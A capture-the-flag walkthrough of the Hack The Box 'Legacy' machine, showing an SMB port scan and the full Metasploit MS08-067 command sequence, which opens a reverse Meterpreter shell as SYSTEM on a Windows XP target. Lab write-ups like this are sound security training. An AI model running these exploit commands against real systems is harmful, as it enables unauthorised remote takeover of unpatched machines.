Hack The Box - Legacy

Hack The Box - Legacy

Machine: Legacy
OS: windows
Difficulty: easy
Platform: htb
Date: 2024-12-27
Tags: #CTF #Hack The Box #Walkthrough #Legacy

Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows. Only one publicly available exploit is required to obtain administrator access.

Difficulty: Easy
OS: Windows
Official Link: Hack The Box Legacy
YouTube: Terminal Trouble - HTB Legacy

Reconnaissance

Port Scan

rustscan --addresses "$TARGET" --top

Open 10.129.79.154:135
Open 10.129.79.154:139
Open 10.129.79.154:445

EuropaPark_10_01_2026_Matterhornblitz.jpeg

PORT    STATE SERVICE      REASON
135/tcp open  msrpc        syn-ack ttl 127
139/tcp open  netbios-ssn  syn-ack ttl 127
445/tcp open  microsoft-ds syn-ack ttl 127

Windows XP with SMB open - classic target.

Exploitation

Using Metasploit with MS08-067 (Windows Server Service vulnerability):

msfconsole
use exploit/windows/smb/ms08_067_netapi

set RHOST 10.129.79.154
set LHOST tun0
run

[*] Started reverse TCP handler on 10.10.14.69:4444
[*] 10.129.79.154:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.79.154:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Meterpreter session 1 opened

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Direct SYSTEM shell - no privesc needed!

Flags

User Flag

Located at C:\Documents and Settings\john\Desktop\user.txt

Root Flag

Located at C:\Documents and Settings\Administrator\Desktop\root.txt